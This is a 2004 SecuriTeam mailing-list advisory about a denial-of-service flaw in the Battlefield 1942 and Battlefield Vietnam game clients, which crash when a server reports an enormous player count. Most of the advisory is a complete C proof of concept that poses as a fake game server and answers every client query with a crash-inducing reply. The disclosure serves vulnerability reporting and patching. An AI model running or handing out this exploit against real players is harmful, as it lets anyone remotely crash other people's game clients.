[NT] Battlefield 1942 and Vietnam Broadcast Client Crash
From: SecuriTeam (support_at_securiteam.com)
Date: 12/12/04
- Previous message: SecuriTeam: "[NEWS] Mac OS X / Adobe Version Cue Local Root"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 12 Dec 2004 10:28:14 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Battlefield 1942 and Vietnam Broadcast Client Crash
------------------------------------------------------------------------
SUMMARY
Battlefield 1942 and Vietnam are two of the most known and played FPS
games based on the relative military conflicts. They are developed by
<http://www.dice.se> Digital Illusions and have been released respectively
at September 2002 and March 2004.
A vulnerability in the way Battlefield 1942 and Vietnam parsers incoming
data allows an attacker to cause the program to crash.
DETAILS
Vulnerable Systems:
* Battlefield 1942 versions 1.6.19 and prior
* Battlefield Vietnam versions 1.2 and prior
Immune Systems:
* Battlefield 1924 version 1.6.1b
* Battlefield Vietnam version 1.21b
Just like any other multiplayer server, Battlefield contacts a master
server and queries it in order to discover the existence of other game
servers. The client then queries each of the game servers for information
about games which is displayed in the in-game display browser.
A problem exists while parsing replies from game servers. When a very
large number of players ("numplayers" parameter) is reported to the
client, by a server, the client freezes completely and a few seconds later
will generate a fault due to an access to a NULL pointer.
This is a passive broadcast attack in which an attacker is able to crash
any client if the attacker is visible on the game server.
A proof of concept code for this Denial Of Service vulnerability is listed
below.
Proof Of Concept
/*
by Luigi Auriemma
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef WIN32
#include <winsock.h>
#include "winerr.h"
#define close closesocket
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#endif
#define VER "0.1"
#define BUFFSZ 2048
#define BOOMPLAYERS 2147483647 /* BUG */
#define BOOM "\\gamename\\%s" \
"\\gamever\\1.6" \
"\\location\\0" \
"\\hostname\\crash" \
"\\hostport\\%d" \
"\\mapname\\aberdeen" \
"\\numplayers\\%u" \
"\\maxplayers\\%u" /* not needed to be the same value
*/ \
"\\final\\" \
"\\queryid\\1.1"
void std_err(void);
int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd,
len,
pcklen,
on = 1,
psz;
u_short port;
u_char buff[BUFFSZ + 1],
pck[BUFFSZ + 1];
setbuf(stdout, NULL);
fputs("\n"
"Battlefield broadcast client crash "VER"\n"
" 1942 <= 1.6.19 and Vietnam <= 1.2\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@altervista.org\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);
if(argc < 3) {
printf("\n"
"Usage: %s <game> <port>\n"
"\n"
"Game:\n"
" bfvietnam = Battlefield Vietnam\n"
" bfield1942 = Battlefield 1942\n"
" bfield1942sw = Battlefield 1942: Secret Weapons of WW2\n"
" bfield1942rtr = Battlefield 1942: Road to Rome\n"
" bfield1942swd = Battlefield 1942: Secret Weapons of WW2
Demo\n"
" bfield1942d = Battlefield 1942 Demo\n"
"\n"
"Port:\n"
" 23000 = default Internet port\n"
" 22000 = default LAN port\n"
"\n", argv[0]);
exit(1);
}
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
port = atoi(argv[2]);
peer.sin_addr.s_addr = INADDR_ANY;
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
psz = sizeof(peer);
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();
if(setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on))
< 0) std_err();
if(bind(sd, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
pcklen = snprintf(
pck,
BUFFSZ,
BOOM,
argv[1],
port,
BOOMPLAYERS,
BOOMPLAYERS);
if((pcklen < 0) || (pcklen > BUFFSZ)) exit(1);
fputs("Clients:\n", stdout);
for(;;) {
len = recvfrom(sd, buff, BUFFSZ, 0, (struct sockaddr *)&peer,
&psz);
if(len < 0) continue;
buff[len] = 0x00;
printf("%16s:%5hu %s\n",
inet_ntoa(peer.sin_addr), ntohs(peer.sin_port),
buff);
if(sendto(sd, pck, pcklen, 0, (struct sockaddr *)&peer,
sizeof(peer))
< 0) std_err();
}
close(sd);
return(0);
}
#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif
ADDITIONAL INFORMATION
The information has been provided by <mailto:aluigi@autistici.org> Luigi
Auriemma.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NEWS] Mac OS X / Adobe Version Cue Local Root"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
